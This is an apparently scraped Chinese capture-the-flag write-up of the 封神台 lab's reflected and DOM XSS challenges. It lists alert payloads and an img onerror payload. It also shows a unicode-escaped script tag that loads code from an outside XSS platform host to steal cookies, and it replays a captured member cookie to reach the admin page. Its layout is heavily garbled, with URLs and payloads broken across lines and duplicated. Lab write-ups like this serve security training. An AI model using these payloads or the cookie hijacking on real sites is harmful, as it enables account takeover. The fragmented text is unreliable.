-
-
【封神台】前端渗透 XSS wp
-
发表于:
2021-8-5 13:46
2849
-
环境:http://59.63.200.79:8082/
payload
先找一个xss平台导航
payload
将这个两个cookie值加入
了解一些基础知识
DOM XSS注入核心代码document,程序和脚本可以通过dom接口来修改前端网页
直接去导航站长工具
' oninput
=
alert(
/
xss
/
)
' oninput
=
alert(
/
xss
/
) \
http:
/
/
59.63
.
200.79
:
8082
/
index.php?c
=
mail&m
=
<script>alert(
/
xss
/
)<
/
script>
http:
/
/
59.63
.
200.79
:
8082
/
index.php?c
=
mail&m
=
<script>alert(
/
xss
/
)<
/
script>
http:
/
/
59.63
.
200.79
:
8082
/
index.php?c
=
mail&m
=
极限最短代码
http:
/
/
59.63
.
200.79
:
8082
/
index.php?c
=
mail&m
=
极限最短代码
member_cookie
=
d256812b83f3751716e6
member_uid
=
1
member_cookie
=
d256812b83f3751716e6
member_uid
=
1
http:
/
/
59.63
.
200.79
:
8082
/
admin.php
http:
/
/
59.63
.
200.79
:
8082
/
admin.php
http:
/
/
59.63
.
200.79
:
8014
/
dom_xss
/
index.php
/
.txt?
id
=
<img src
=
x onerror
=
alert(
/
dom
-
xss
/
)
http:
/
/
59.63
.
200.79
:
8014
/
dom_xss
/
index.php
/
.txt?
id
=
<img src
=
x onerror
=
alert(
/
dom
-
xss
/
)
http:
/
/
59.63
.
200.79
:
8014
/
dom_xss
/
?
id
=
\u003c\u0073\u0043\u0052\u0069\u0050\u0074\u002f\u0053\u0072\u0043\u003d\u002f\u002f\u0078\u0073\u002e\u0073\u0062\u002f\u006f\u0050\u0036\u0078\u003e
http:
/
/
59.63
.
200.79
:
8014
/
dom_xss
/
?
id
=
\u003c\u0073\u0043\u0052\u0069\u0050\u0074\u002f\u0053\u0072\u0043\u003d\u002f\u002f\u0078\u0073\u002e\u0073\u0062\u002f\u006f\u0050\u0036\u0078\u003e
- 环境:http://b-ref-xss-1s.lab.aqlab.cn/
- 了解一下
-
一般证明XSS是否存在,就是在正常页面传参然后构建参数让他弹窗就是存在XSS了
XSS一般在什么业务场景容易遇见?
重灾区:评论区、留言区、个人信息、订单信息等。
针对型:站内信、网页即时通讯、私信、意见反馈。
存在风险:搜索框、当前目录、图片属性等。
环境:http://59.63.200.79:8082/
- 环境:http://59.63.200.79:8014/dom_xss/
- 注意:被waf拦截就将cookie清空
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)